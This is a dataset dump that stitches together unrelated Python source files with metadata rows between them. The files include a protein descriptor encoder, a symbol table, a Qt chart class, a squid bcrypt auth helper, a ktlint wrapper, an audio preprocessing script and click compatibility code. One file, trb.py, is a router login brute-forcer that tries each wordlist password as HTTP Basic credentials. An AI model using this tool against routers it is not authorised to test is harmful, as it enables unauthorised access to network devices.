    fileAAidx = re.sub('codes$', '', os.path.split(os.path.realpath(__file__))[0]) + r'\data\AAidx.txt' if platform.system() == 'Windows' else 'peptidereactor/iFeature/data/AAidx.txt'
    with open(fileAAidx) as f:
        records = f.readlines()[1:]
    # Map AAindex property name -> list of 20 per-residue values (strings).
    myDict = {}
    for i in records:
        array = i.rstrip().split('\t')
        myDict[array[0]] = array[1:]
    AAidx = []
    AAidxName = []
    for i in props:
        if i in myDict:
            AAidx.append(myDict[i])
            AAidxName.append(i)
        else:
            print('"' + i + '" properties not exist.')
            return None
    # One row of 20 values per property; then z-normalise each property row.
    AAidx1 = np.array([float(j) for i in AAidx for j in i])
    AAidx = AAidx1.reshape((len(AAidx),20))
    pstd = np.std(AAidx, axis=1)
    pmean = np.average(AAidx, axis=1)
    for i in range(len(AAidx)):
        for j in range(len(AAidx[i])):
            AAidx[i][j] = (AAidx[i][j] - pmean[i]) / pstd[i]
    # Residue letter -> column index into the normalised property rows.
    index = {}
    for i in range(len(AA)):
        index[AA[i]] = i
    encodings = []
    header = ['#']
    for p in props:
        for n in range(1, nlag + 1):
            header.append(p + '.lag' + str(n))
    encodings.append(header)
    for i in fastas:
        # Gaps ('-') are removed from the sequence before encoding.
        name, sequence = i[0], re.sub('-', '', i[1])
        code = [name]
        N = len(sequence)
        for prop in range(len(props)):
            for n in range(1, nlag + 1):
                if len(sequence) > nlag:
                    # if key is '-', then the value is 0
                    rn = sum([AAidx[prop][index.get(sequence[j], 0)] * AAidx[prop][index.get(sequence[j + n], 0)] for j in range(len(sequence)-n)]) / (N - n)
                else:
                    rn = 'NA'
                code.append(rn)
        encodings.append(code)
    return encodings
if __name__ == '__main__':
    # CLI wrapper: read a FASTA file, encode it, and write a TSV descriptor.
    parser = argparse.ArgumentParser(usage="it's usage tip.",
                                     description="Moran descriptor")
    parser.add_argument("--file", required=True, help="input fasta file")
    parser.add_argument("--props", help="input fasta file")
    parser.add_argument("--nlag", help="input fasta file")
    parser.add_argument("--out", dest='outFile', help="the generated descriptor file")
    args = parser.parse_args()
    fastas = readFasta.readFasta(args.file)
    # Properties arrive colon-separated; fall back to the eight defaults.
    props = args.props.split(':') if args.props != None else ['CIDH920105', 'BHAR880101', 'CHAM820101', 'CHAM820102',
                                                              'CHOC760101', 'BIGC670101', 'CHAM810101', 'DAYM780201']
    nlag = int(args.nlag) if args.nlag != None else 30
    output = args.outFile if args.outFile != None else 'encoding.tsv'
    encodings = NMBroto(fastas, props, nlag)
saveCode.savetsv(encodings, output) | 33 | 180 | 0.653388 |
import sys, platform, os, re
import argparse
import numpy as np
pPath = os.path.split(os.path.realpath(__file__))[0]
sys.path.append(pPath)
import checkFasta
import readFasta
import saveCode
def NMBroto(fastas, props=['CIDH920105', 'BHAR880101', 'CHAM820101', 'CHAM820102',
'CHOC760101', 'BIGC670101', 'CHAM810101', 'DAYM780201'],
nlag = 30, **kw):
if checkFasta.minSequenceLengthWithNormalAA(fastas) < nlag + 1:
print('Error: all the sequence length should be larger than the nlag+1: ' + str(nlag + 1) + '\n\n')
return 0
AA = 'ARNDCQEGHILKMFPSTWYV'
fileAAidx = re.sub('codes$', '', os.path.split(os.path.realpath(__file__))[0]) + r'\data\AAidx.txt' if platform.system() == 'Windows' else 'peptidereactor/iFeature/data/AAidx.txt'
with open(fileAAidx) as f:
records = f.readlines()[1:]
myDict = {}
for i in records:
array = i.rstrip().split('\t')
myDict[array[0]] = array[1:]
AAidx = []
AAidxName = []
for i in props:
if i in myDict:
AAidx.append(myDict[i])
AAidxName.append(i)
else:
print('"' + i + '" properties not exist.')
return None
AAidx1 = np.array([float(j) for i in AAidx for j in i])
AAidx = AAidx1.reshape((len(AAidx),20))
pstd = np.std(AAidx, axis=1)
pmean = np.average(AAidx, axis=1)
for i in range(len(AAidx)):
for j in range(len(AAidx[i])):
AAidx[i][j] = (AAidx[i][j] - pmean[i]) / pstd[i]
index = {}
for i in range(len(AA)):
index[AA[i]] = i
encodings = []
header = ['#']
for p in props:
for n in range(1, nlag + 1):
header.append(p + '.lag' + str(n))
encodings.append(header)
for i in fastas:
name, sequence = i[0], re.sub('-', '', i[1])
code = [name]
N = len(sequence)
for prop in range(len(props)):
for n in range(1, nlag + 1):
if len(sequence) > nlag:
rn = sum([AAidx[prop][index.get(sequence[j], 0)] * AAidx[prop][index.get(sequence[j + n], 0)] for j in range(len(sequence)-n)]) / (N - n)
else:
rn = 'NA'
code.append(rn)
encodings.append(code)
return encodings
if __name__ == '__main__':
parser = argparse.ArgumentParser(usage="it's usage tip.",
description="Moran descriptor")
parser.add_argument("--file", required=True, help="input fasta file")
parser.add_argument("--props", help="input fasta file")
parser.add_argument("--nlag", help="input fasta file")
parser.add_argument("--out", dest='outFile', help="the generated descriptor file")
args = parser.parse_args()
fastas = readFasta.readFasta(args.file)
props = args.props.split(':') if args.props != None else ['CIDH920105', 'BHAR880101', 'CHAM820101', 'CHAM820102',
'CHOC760101', 'BIGC670101', 'CHAM810101', 'DAYM780201']
nlag = int(args.nlag) if args.nlag != None else 30
output = args.outFile if args.outFile != None else 'encoding.tsv'
encodings = NMBroto(fastas, props, nlag)
saveCode.savetsv(encodings, output) | true | true |
1c3c9f9d6def9ec236cb8b6045ae02325cbe876a | 1,882 | py | Python | mamba/symbol_table.py | laggycomputer/mamba-lang | f3223a23a0051ca06e5c330d204c09372a3dd9cb | [
"MIT"
] | 11 | 2018-11-11T14:13:53.000Z | 2021-12-22T14:37:54.000Z | mamba/symbol_table.py | laggycomputer/mamba-lang | f3223a23a0051ca06e5c330d204c09372a3dd9cb | [
"MIT"
] | 5 | 2018-12-08T20:19:20.000Z | 2020-04-29T12:26:47.000Z | mamba/symbol_table.py | laggycomputer/mamba-lang | f3223a23a0051ca06e5c330d204c09372a3dd9cb | [
"MIT"
] | 4 | 2018-12-08T17:34:34.000Z | 2021-12-22T16:17:44.000Z | from mamba.exceptions import *
class SymbolTable:
    """Scoped symbol table: one global scope plus a stack of local scopes.

    Functions and variables live in separate namespaces.  Entering a
    function body pushes a fresh local table (``set_local(True)``);
    leaving it pops the table again (``set_local(False)``).
    """

    # Keys into the internal table dict.
    __func = "functions"
    __sym = "symbols"
    __local = "local"

    def __init__(self):
        # Per-instance storage.  Previously this was a *class* attribute,
        # so every SymbolTable instance shared (and mutated) the same
        # dict, leaking symbols between independent interpreter runs.
        self.__table = {self.__func: {}, self.__sym: {}, self.__local: []}

    def __is_local(self):
        """
        Returns true if symbol table is being called from inside
        a function rather than the global scope
        :return: bool
        """
        return len(self.__table[self.__local]) > 0

    def table(self):
        # Expose the raw table (used by debugging/inspection code).
        return self.__table

    def get_local_table(self):
        """
        Returns the active local symbol table (the last one on the stack)
        """
        t = self.__table[self.__local]
        return t[len(t) - 1]

    def set_local(self, flag):
        # True pushes a new (empty) local scope; False pops the current one.
        if flag:
            self.__table[self.__local].append({})
        else:
            self.__table[self.__local].pop()

    def get_sym(self, sym):
        """Resolve *sym*, innermost local scope first, then globals."""
        if self.__is_local():
            # Check all the local symbol tables starting from the current one
            for tab in reversed(self.__table[self.__local]):
                if sym in tab:
                    return tab[sym]
        # if not found check the global scope
        if sym in self.__table[self.__sym]:
            return self.__table[self.__sym][sym]
        # nope... sorry :(
        raise SymbolNotFound("Undefined variable '%s'" % sym)

    def set_sym(self, sym, val):
        """Bind *sym* in the current local scope, or globally at top level."""
        if self.__is_local():
            self.get_local_table()[sym] = val
        else:
            self.__table[self.__sym][sym] = val

    def get_func(self, name):
        """Look up a function definition; raises SymbolNotFound if missing."""
        if name in self.__table[self.__func]:
            return self.__table[self.__func][name]
        raise SymbolNotFound("Undefined function '%s'" % name)

    def set_func(self, name, val):
        """Register a function; redeclaration is an error."""
        if name in self.__table[self.__func]:
            raise DuplicateSymbol("Cannot redeclare function '%s'" % name)
        self.__table[self.__func][name] = val
| 27.275362 | 77 | 0.575452 | from mamba.exceptions import *
class SymbolTable:
__func = "functions"
__sym = "symbols"
__local = "local"
__table = {__func: {}, __sym: {}, __local: []}
def __is_local(self):
return len(self.__table[self.__local]) > 0
def table(self):
return self.__table
def get_local_table(self):
t = self.__table[self.__local]
return t[len(t) - 1]
def set_local(self, flag):
if flag:
self.__table[self.__local].append({})
else:
self.__table[self.__local].pop()
def get_sym(self, sym):
if self.__is_local():
for tab in reversed(self.__table[self.__local]):
if sym in tab:
return tab[sym]
if sym in self.__table[self.__sym]:
return self.__table[self.__sym][sym]
raise SymbolNotFound("Undefined variable '%s'" % sym)
def set_sym(self, sym, val):
if self.__is_local():
self.get_local_table()[sym] = val
else:
self.__table[self.__sym][sym] = val
def get_func(self, name):
if name in self.__table[self.__func]:
return self.__table[self.__func][name]
raise SymbolNotFound("Undefined function '%s'" % name)
def set_func(self, name, val):
if name in self.__table[self.__func]:
raise DuplicateSymbol("Cannot redeclare function '%s'" % name)
self.__table[self.__func][name] = val
| true | true |
1c3ca0a1143a1916ef7cbeb4266c385ea0c07641 | 229 | py | Python | prettyqt/charts/percentbarseries.py | phil65/PrettyQt | 26327670c46caa039c9bd15cb17a35ef5ad72e6c | [
"MIT"
] | 7 | 2019-05-01T01:34:36.000Z | 2022-03-08T02:24:14.000Z | prettyqt/charts/percentbarseries.py | phil65/PrettyQt | 26327670c46caa039c9bd15cb17a35ef5ad72e6c | [
"MIT"
] | 141 | 2019-04-16T11:22:01.000Z | 2021-04-14T15:12:36.000Z | prettyqt/charts/percentbarseries.py | phil65/PrettyQt | 26327670c46caa039c9bd15cb17a35ef5ad72e6c | [
"MIT"
] | 5 | 2019-04-17T11:48:19.000Z | 2021-11-21T10:30:19.000Z | from __future__ import annotations
from prettyqt import charts
from prettyqt.qt import QtCharts

# Re-parent the Qt class onto prettyqt's AbstractBarSeries so instances
# gain the prettyqt convenience API (standard pattern in this package).
QtCharts.QPercentBarSeries.__bases__ = (charts.AbstractBarSeries,)


class PercentBarSeries(QtCharts.QPercentBarSeries):
    """Percent bar series; behaviour comes entirely from the re-based Qt class."""
    pass
| 19.083333 | 66 | 0.829694 | from __future__ import annotations
from prettyqt import charts
from prettyqt.qt import QtCharts
QtCharts.QPercentBarSeries.__bases__ = (charts.AbstractBarSeries,)
class PercentBarSeries(QtCharts.QPercentBarSeries):
pass
| true | true |
1c3ca0d145d0d7bb16b0dbfbb70bbf79a88b8932 | 2,937 | py | Python | src/basic_bcrypt_auth.py | krayzpipes/squid-bcrypt | 09f7c255865aa5102e9a657c53101dde85db2414 | [
"Apache-2.0"
] | null | null | null | src/basic_bcrypt_auth.py | krayzpipes/squid-bcrypt | 09f7c255865aa5102e9a657c53101dde85db2414 | [
"Apache-2.0"
] | null | null | null | src/basic_bcrypt_auth.py | krayzpipes/squid-bcrypt | 09f7c255865aa5102e9a657c53101dde85db2414 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
"""Squid helper for authenticating basic auth against bcrypt hashes.
See Authenticator > Basic Scheme here:
https://wiki.squid-cache.org/Features/AddonHelpers
Designed to work with bcrypt hash files created with htpasswd:
EXAMPLE: htpasswd -cbB -C 10 /path/to/password_file username password
This program loads the password file content into memory based on the
assumption the underlying host is ephemeral and the password file is
populated when the host is bootstrapped.
"""
import sys
import bcrypt
def load_hashes_to_memory(filename: str) -> dict:
    """Return a dict mapping lowercased usernames to bcrypt hash strings.

    The file is expected in htpasswd format, one ``user:hash`` entry per
    line, e.g.::

        myusername:$2y$10$UwKsKOkgObpauy5wzcN2euKZ/lgQZCP3A8MQsatZfNdPt5hNUXFae

    Blank lines are skipped.  A non-empty line without a ``:`` separator
    raises ``RuntimeError`` (malformed password file).
    """
    password_kv = {}
    with open(filename, 'r') as f:
        for line in f:
            line = line.strip()
            if not line:
                # Tolerate blank lines instead of crashing on them.
                continue
            # Split only on the FIRST ':' so a hash containing ':' is kept
            # intact (the old split(':') silently truncated it).
            user, sep, digest = line.partition(':')
            if not sep:
                raise RuntimeError("password file has invalid content")
            password_kv[user.strip().lower()] = digest.strip()
    return password_kv
def write_stdout(response: str) -> None:
    """Emit one helper-protocol reply line on stdout.

    Surrounding whitespace is stripped first so exactly one trailing
    newline is written; the stream is flushed so the proxy sees the
    reply immediately.
    """
    sys.stdout.write('%s\n' % response.strip())
    sys.stdout.flush()
def run_loop(password_kv: dict) -> None:
    """Serve squid basic-auth requests from stdin until the pipe closes.

    Each request line is ``<username> <password>``; the reply is one of
    ``OK``, ``ERR ...`` (bad credentials) or ``BH ...`` (helper error),
    following squid's basic auth helper protocol.
    """
    while True:
        line = sys.stdin.readline()
        if not line:
            # EOF: squid closed our stdin.  The previous code treated EOF
            # like an "empty line" request and spun forever emitting BH
            # replies; terminate cleanly instead.
            break
        try:
            line = line.strip()
            if line == '':
                write_stdout('BH message="empty line from proxy"')
                continue
            # maxsplit=1 keeps passwords that contain spaces intact.
            parts = line.split(' ', 1)
            try:
                username = parts[0].strip()
                password = parts[1].strip()
            except IndexError:
                write_stdout('BH message="stdin message invalid format"')
                continue
            # Usernames are stored lowercased by load_hashes_to_memory.
            password_hash = password_kv.get(username.lower(), None)
            if password_hash is None:
                write_stdout('ERR message="invalid credentials"')
                continue
            authenticated = bcrypt.checkpw(password.encode('utf-8'),
                                           password_hash.encode('utf-8'))
            if authenticated:
                write_stdout('OK')
            else:
                write_stdout('ERR message="invalid credentials"')
        except Exception:
            # Never crash the helper; report "broken helper" and keep going.
            write_stdout('BH message="unknown error"')
def main():
    """Load hashes from file into memory and start the
    bcrypt validation service."""
    # argv[1] is the path to the htpasswd-style password file.
    password_file = sys.argv[1]
    user_hash_kv = load_hashes_to_memory(password_file)
    run_loop(user_hash_kv)

if __name__ == "__main__":
    main()
    exit(0)
| 28.514563 | 114 | 0.617297 |
import sys
import bcrypt
def load_hashes_to_memory(filename: str) -> dict:
password_kv = {}
with open(filename, 'r') as f:
for line in f:
sections = line.strip().split(':')
try:
user = sections[0].strip().lower()
hash = sections[1].strip()
except IndexError:
raise RuntimeError("password file has invalid content")
else:
password_kv[user] = hash
return password_kv
def write_stdout(response: str) -> None:
response = response.strip()
sys.stdout.write(f'{response}\n')
sys.stdout.flush()
def run_loop(password_kv: dict) -> None:
while True:
try:
line = sys.stdin.readline()
line = line.strip()
if line == '':
write_stdout('BH message="empty line from proxy')
continue
parts = line.split(' ', 1) # setting maxsplit to 1 makes sure we handle passwords with spaces in them
try:
username = parts[0].strip()
password = parts[1].strip()
except IndexError:
write_stdout('BH message="stdin message invalid format')
continue
password_hash = password_kv.get(username.lower(), None)
if password_hash is None:
write_stdout('ERR message="invalid credentials')
continue
authenticated = bcrypt.checkpw(password.encode('utf-8'), password_hash.encode('utf-8'))
if authenticated:
write_stdout('OK')
continue
write_stdout('ERR message="invalid credentials"')
continue
except Exception:
write_stdout('BH message="unknown error"')
continue
def main():
password_file = sys.argv[1]
user_hash_kv = load_hashes_to_memory(password_file)
run_loop(user_hash_kv)
if __name__ == "__main__":
main()
exit(0)
| true | true |
1c3ca12a5a8495d2fe270c4c214a1f489ee9a871 | 2,015 | py | Python | lintreview/tools/ktlint.py | josemanimala/lint-review | a0abdf2ec29fb63855b5caca36eea6bc2693cc92 | [
"MIT"
] | null | null | null | lintreview/tools/ktlint.py | josemanimala/lint-review | a0abdf2ec29fb63855b5caca36eea6bc2693cc92 | [
"MIT"
] | null | null | null | lintreview/tools/ktlint.py | josemanimala/lint-review | a0abdf2ec29fb63855b5caca36eea6bc2693cc92 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
import logging
import os
import lintreview.docker as docker
from lintreview.tools import Tool, process_checkstyle
log = logging.getLogger(__name__)
class Ktlint(Tool):
    """lint-review tool wrapper that runs ktlint inside its docker image."""

    name = 'ktlint'

    def check_dependencies(self):
        """
        See if ktlint is on the system path.
        """
        return docker.image_exists('ktlint')

    def match_file(self, filename):
        """
        Check if a file should be linted using Ktlint (.kt / .kts).
        """
        base = os.path.basename(filename)
        _, ext = os.path.splitext(base)
        return ext in ('.kt', '.kts')

    def process_files(self, files):
        """
        Run code checks with ktlint and record checkstyle problems.
        """
        log.debug('Processing %s files with %s', files, self.name)
        command = self._create_command()
        command += files
        output = docker.run('ktlint', command, self.base_path)
        process_checkstyle(self.problems, output, docker.strip_base)

    def _create_command(self):
        """Build the ktlint argv from the configured tool options."""
        command = ['ktlint', '--color', '--reporter=checkstyle']
        if self.options.get('android', False):
            command.append('--android')
        if self.options.get('experimental', False):
            command.append('--experimental')
        if self.options.get('ruleset'):
            command += ['-R', self.options.get('ruleset')]
        if self.options.get('config'):
            # ktlint expects a single '--editorconfig=<path>' token.  The
            # previous code appended '--editorconfig=' and the path as two
            # separate argv entries, so ktlint saw an empty option value
            # and treated the path as a file to lint.
            command.append('--editorconfig=' + self.options.get('config'))
        return command

    def has_fixer(self):
        """
        ktlint has a fixer that can be enabled through configuration.
        """
        return bool(self.options.get('fixer', False))

    def process_fixer(self, files):
        """Run ktlint in the fixer mode.
        """
        command = self.create_fixer_command(files)
        docker.run('ktlint', command, self.base_path)

    def create_fixer_command(self, files):
        """Build the argv for ktlint's autofix (-F) mode."""
        command = ['ktlint']
        command.append('-F')
        command += files
        return command
| 29.632353 | 70 | 0.601489 | from __future__ import absolute_import
import logging
import os
import lintreview.docker as docker
from lintreview.tools import Tool, process_checkstyle
log = logging.getLogger(__name__)
class Ktlint(Tool):
name = 'ktlint'
def check_dependencies(self):
return docker.image_exists('ktlint')
def match_file(self, filename):
base = os.path.basename(filename)
name, ext = os.path.splitext(base)
return ext in ('.kt', '.kts')
def process_files(self, files):
log.debug('Processing %s files with %s', files, self.name)
command = self._create_command()
command += files
output = docker.run('ktlint', command, self.base_path)
process_checkstyle(self.problems, output, docker.strip_base)
def _create_command(self):
command = ['ktlint', '--color', '--reporter=checkstyle']
if self.options.get('android', False):
command.append('--android')
if self.options.get('experimental', False):
command.append('--experimental')
if self.options.get('ruleset'):
command += ['-R', self.options.get('ruleset')]
if self.options.get('config'):
command += ['--editorconfig=', self.options.get('config')]
return command
def has_fixer(self):
return bool(self.options.get('fixer', False))
def process_fixer(self, files):
command = self.create_fixer_command(files)
docker.run('ktlint', command, self.base_path)
def create_fixer_command(self, files):
command = ['ktlint']
command.append('-F')
command += files
return command
| true | true |
1c3ca22b1c2e1804997daa4351a616d3fd087936 | 4,422 | py | Python | src/DataPrep.py | BZ-2453/DeepBass | a0f4ab8613994a8cfcf732fa2b2b2840313264d4 | [
"MIT"
] | 1 | 2019-06-05T23:47:32.000Z | 2019-06-05T23:47:32.000Z | src/DataPrep.py | BZ-2453/DeepBass | a0f4ab8613994a8cfcf732fa2b2b2840313264d4 | [
"MIT"
] | null | null | null | src/DataPrep.py | BZ-2453/DeepBass | a0f4ab8613994a8cfcf732fa2b2b2840313264d4 | [
"MIT"
] | 1 | 2018-11-14T02:58:35.000Z | 2018-11-14T02:58:35.000Z | import os
import argparse
from ingestion.IO_utils import Load
import numpy as np
import errno
from preprocess.SilenceRemoval import SR
from preprocess.np_to_tfrecords import np_to_tfrecords
from preprocess.get_time import get_time
from os import listdir
from os.path import isfile, join
from joblib import Parallel, delayed
###############################################################################
# Directory fault checking
class FullPaths(argparse.Action):
    """argparse action that normalises a path argument.

    Stores the absolute form of the supplied path (with ``~`` expanded)
    on the namespace instead of the raw command-line string.
    """

    def __call__(self, parser, namespace, values, option_string=None):
        expanded = os.path.expanduser(values)
        setattr(namespace, self.dest, os.path.abspath(expanded))
def is_dir(dirname):
    """argparse type-checker: return *dirname* if it is a real directory.

    Raises ``argparse.ArgumentTypeError`` otherwise, so argparse reports
    a clean usage error instead of a traceback.
    """
    if os.path.isdir(dirname):
        return dirname
    raise argparse.ArgumentTypeError("{0} is not a directory".format(dirname))
###############################################################################
def Prep(fname, load_dir, sr, duration_thresh, sample_length, crop_style):
    """Screen one audio file and return its cropped begin/end snippets.

    Returns None when the file is too long, too short or unreadable;
    otherwise a list with the silence-stripped beginning and ending
    snippets (each ``sample_length`` samples) when crop_style=='BegEnd'.

    NOTE(review): assumes get_time() returns False for unreadable files
    and a duration in seconds otherwise -- confirm in preprocess.get_time.
    """
    # Remove very long, short, or corrupt audio files.
    # Don't want remixes of a lot of songs (typically long audio files).
    duration = get_time(load_dir, fname)
    if duration >= duration_thresh or duration == False:
        return None
    elif duration < sample_length*3/sr: # give ourselves some buffer with x3
        return None
    else:
        # Load audio only for valid files
        Data = []
        audio, _ = Load(load_dir, fname, sr, verbose=False)
        if crop_style == 'BegEnd':
            # Strip silence from each end, then take sample_length samples.
            begin_audio = SR(audio, 'begin')[0:sample_length]
            end_audio = SR(audio, 'end')[-sample_length:]
            Data.append(begin_audio)
            Data.append(end_audio)
        return (Data)
###############################################################################
"""Script to load in training/validation/test data, preprocess, and convert to
tfrecords format for training the NSynth model.
Example :
python DataPrep.py ~/Data/EDM/ 4 ~/DeepBass/data/preprocessed/EDM/ EDM -n_cpu=72
"""
# CLI: paths are expanded by FullPaths and validated by is_dir.
parser = argparse.ArgumentParser(description='Load Audio Files')
parser.add_argument('-load_dir', help='Directory of audio files',
                    action=FullPaths, type=is_dir, required=True)
parser.add_argument('-time', help='Specify the amount of time to crop to',
                    type=float, required=True)
parser.add_argument('-save_dir', help='Directory to save processed audio files',
                    type=str, required=True)
parser.add_argument('-savename', help='Specify the name of the tfrecords file',
                    type=str, required=True)
parser.add_argument('-crop_style', help='Method for temporal cropping',
                    choices=['BegEnd'], default='BegEnd')
parser.add_argument('-sr', default=16000, help='Specify sampling rate for audio',
                    type=int)
parser.add_argument('-duration_thresh', default=1000, help='Maximum number of \
                    seconds per audio file.', type=float)
parser.add_argument('-n_cpu', default=1, help='Number of CPU threads to use.',
                    type=int)
args = parser.parse_args()

# Create the save folder if it does not exist
if not os.path.exists(args.save_dir):
    try:
        os.makedirs(args.save_dir)
    except OSError as exc: # Guard against race condition
        if exc.errno != errno.EEXIST:
            raise

# All regular files in the load directory are candidate audio files.
filenames = [f for f in listdir(args.load_dir) if isfile(join(args.load_dir,
                                                              f))]

# Number of samples to export
sample_length = int(args.time * args.sr)

Data = []
# Screen and crop every file in parallel; Prep returns None for rejects.
Data = Parallel(n_jobs=args.n_cpu)(delayed(Prep)(fname,
                                                 args.load_dir,
                                                 args.sr,
                                                 args.duration_thresh,
                                                 sample_length,
                                                 args.crop_style) \
                                   for fname in filenames)

# Remove audio snippets that returned None
Data = [x for x in Data if x is not None]
# Merge everything into one list from a list of lists
Data = [item for sublist in Data for item in sublist]
# Remove empty lists
Data = [x for x in Data if x != []]

os.chdir(args.save_dir) # Move directory for saving
np_to_tfrecords(np.stack(Data), None, args.savename, verbose=True) | 42.932039 | 82 | 0.60493 | import os
import argparse
from ingestion.IO_utils import Load
import numpy as np
import errno
from preprocess.SilenceRemoval import SR
from preprocess.np_to_tfrecords import np_to_tfrecords
from preprocess.get_time import get_time
from os import listdir
from os.path import isfile, join
from joblib import Parallel, delayed
| true | true |
1c3ca320e711d55930e495327ed5ac5f2359cf78 | 1,587 | py | Python | trb.py | WalderlanSena/toolsrouterbrute | 8ca08c99162000de6428ee70cd3e0bdc847fc55c | [
"MIT"
] | 7 | 2018-09-12T17:12:39.000Z | 2021-07-02T16:56:18.000Z | trb.py | WalderlanSena/toolsrouterbrute | 8ca08c99162000de6428ee70cd3e0bdc847fc55c | [
"MIT"
] | null | null | null | trb.py | WalderlanSena/toolsrouterbrute | 8ca08c99162000de6428ee70cd3e0bdc847fc55c | [
"MIT"
] | 4 | 2018-06-25T17:54:26.000Z | 2021-04-07T06:11:09.000Z | #!/usr/bin/python
# TOOLS ROUTER BRUTE - V1.0.0
# Developement: Walderlan Sena <senawalderlan@gmail.com>
#
import requests as r
import base64
import sys
import os
def splash():
    """Print the tool's ASCII banner (name, version, project URL)."""
    print(
        """
   TOOLS ROUTER BRUTE - v1.0.0
  Site: https://www.github.com/WalderlanSena/toolsrouterbrute
 Developement: Walderlan Sena <senwalderlan@gmail.com>
        """
    )
# Require arguments; otherwise show the banner plus usage and quit.
if len(sys.argv) < 2:
    splash()
    print("\tUsage: ./trb.py user IPRouter wordlist\n")
    print("\tExample: ./trb.py admin 192.168.1.1 list.txt\n")
    exit(1)
# Hide the terminal cursor while running (restored in the KeyboardInterrupt
# handler and on success).
os.system('setterm -cursor off')
def main():
    """Try every password in the wordlist against the router's HTTP auth.

    argv layout: [1] username, [2] router IP, [3] wordlist path.

    NOTE(review): this is Python 2 code -- ``base64.b64encode`` is called
    on a str and ``response.content`` (bytes on py3) is searched with a
    str needle; both would fail under Python 3.  Confirm the interpreter.
    """
    wordlist = open(sys.argv[3], 'r')
    count = 0
    for i in wordlist:
        login = str(sys.argv[1])
        password = i.rstrip()
        auth = "Basic "
        # Basic auth token: base64("user:password").
        authEncode = auth+base64.b64encode(login+':'+password)
        # The credential is sent as a cookie named "Authorization".
        cookie = {"Authorization": authEncode}
        try:
            response = r.get('http://'+sys.argv[2], cookies=cookie)
        except:
            splash()
            print("\tError to connect: " + sys.argv[2])
            exit(1)
        # Success heuristic: the double negation reduces to count == 1,
        # i.e. the page contains 'id="userName"' exactly once.
        # NOTE(review): verify this marker against the router's pages.
        if not response.content.count('id="userName"') != 1:
            splash()
            os.system('setterm -cursor on')
            print('\n\tPassword Found =====> ' + password)
            exit(0)
        os.system("clear")
        splash()
        count = count + 1
        print('\t[ '+ str(count) + ' ] Password not found ===> ' + password)
if __name__ == "__main__":
    try:
        main();
    except KeyboardInterrupt:
        # Restore the cursor hidden at startup before exiting on Ctrl-C.
        os.system('setterm -cursor on')
        print("\nOperation canceled ! :(\n")
| 23.338235 | 76 | 0.555766 |
import requests as r
import base64
import sys
import os
def splash():
print(
"""
TOOLS ROUTER BRUTE - v1.0.0
Site: https://www.github.com/WalderlanSena/toolsrouterbrute
Developement: Walderlan Sena <senwalderlan@gmail.com>
"""
)
if len(sys.argv) < 2:
splash()
print("\tUsage: ./trb.py user IPRouter wordlist\n")
print("\tExample: ./trb.py admin 192.168.1.1 list.txt\n")
exit(1)
os.system('setterm -cursor off')
def main():
wordlist = open(sys.argv[3], 'r')
count = 0
for i in wordlist:
login = str(sys.argv[1])
password = i.rstrip()
auth = "Basic "
authEncode = auth+base64.b64encode(login+':'+password)
cookie = {"Authorization": authEncode}
try:
response = r.get('http://'+sys.argv[2], cookies=cookie)
except:
splash()
print("\tError to connect: " + sys.argv[2])
exit(1)
if not response.content.count('id="userName"') != 1:
splash()
os.system('setterm -cursor on')
print('\n\tPassword Found =====> ' + password)
exit(0)
os.system("clear")
splash()
count = count + 1
print('\t[ '+ str(count) + ' ] Password not found ===> ' + password)
if __name__ == "__main__":
try:
main();
except KeyboardInterrupt:
os.system('setterm -cursor on')
print("\nOperation canceled ! :(\n")
| true | true |
1c3ca35bcab506e0d9e128e8f0a6d9db17c9822f | 23,409 | py | Python | click/_compat.py | pravarag/click | fa925c9b0994b62486d1963c54d97c9a08cb9862 | [
"BSD-3-Clause"
] | null | null | null | click/_compat.py | pravarag/click | fa925c9b0994b62486d1963c54d97c9a08cb9862 | [
"BSD-3-Clause"
] | null | null | null | click/_compat.py | pravarag/click | fa925c9b0994b62486d1963c54d97c9a08cb9862 | [
"BSD-3-Clause"
] | null | null | null | import re
import io
import os
import sys
import codecs
from weakref import WeakKeyDictionary
# True on Python 2; drives the 2/3 compatibility branches in this module.
PY2 = sys.version_info[0] == 2
CYGWIN = sys.platform.startswith('cygwin')
# Determine local App Engine environment, per Google's own suggestion
APP_ENGINE = ('APPENGINE_RUNTIME' in os.environ and
              'Development/' in os.environ['SERVER_SOFTWARE'])
# App Engine's dev server reports a Windows platform without a real
# Windows console, so it is explicitly excluded from WIN.
WIN = sys.platform.startswith('win') and not APP_ENGINE
# Fallback terminal width when the real width cannot be determined.
DEFAULT_COLUMNS = 80

# Matches ANSI escape sequences: CSI parameter bytes plus the final letter.
_ansi_re = re.compile(r'\033\[((?:\d|;)*)([a-zA-Z])')
def get_filesystem_encoding():
    """Name of the codec used for filenames, or the interpreter default."""
    fs_enc = sys.getfilesystemencoding()
    return fs_enc if fs_enc else sys.getdefaultencoding()
def _make_text_stream(stream, encoding, errors,
                      force_readable=False, force_writable=False):
    """Wrap *stream* in a line-buffered text wrapper that never closes it.

    Missing encoding falls back to the stream's best guess; missing
    errors falls back to 'replace'.
    """
    return _NonClosingTextIOWrapper(
        stream,
        encoding if encoding is not None else get_best_encoding(stream),
        errors if errors is not None else 'replace',
        line_buffering=True,
        force_readable=force_readable,
        force_writable=force_writable,
    )
def is_ascii_encoding(encoding):
    """True if *encoding* resolves to the ASCII codec.

    Unknown encoding names simply yield False rather than raising.
    """
    try:
        codec = codecs.lookup(encoding)
    except LookupError:
        return False
    return codec.name == 'ascii'
def get_best_encoding(stream):
    """Return the stream's declared encoding, upgrading ASCII to UTF-8."""
    encoding = getattr(stream, 'encoding', None) or sys.getdefaultencoding()
    return 'utf-8' if is_ascii_encoding(encoding) else encoding
class _NonClosingTextIOWrapper(io.TextIOWrapper):
    """TextIOWrapper that detaches instead of closing the wrapped stream.

    Destroying the wrapper must not close stdio streams that are owned
    by the caller, hence the ``detach()`` in ``__del__``.
    """

    def __init__(self, stream, encoding, errors,
                 force_readable=False, force_writable=False, **extra):
        # Wrap the raw stream first so it exposes the full io interface.
        self._stream = stream = _FixupStream(stream, force_readable,
                                             force_writable)
        io.TextIOWrapper.__init__(self, stream, encoding, errors, **extra)

    # The io module is a place where the Python 3 text behavior
    # was forced upon Python 2, so we need to unbreak
    # it to look like Python 2.
    if PY2:
        def write(self, x):
            # Byte strings bypass the text layer: flush pending text, then
            # write directly to the underlying buffer (Python 2 semantics).
            if isinstance(x, str) or is_bytes(x):
                try:
                    self.flush()
                except Exception:
                    pass
                return self.buffer.write(str(x))
            return io.TextIOWrapper.write(self, x)

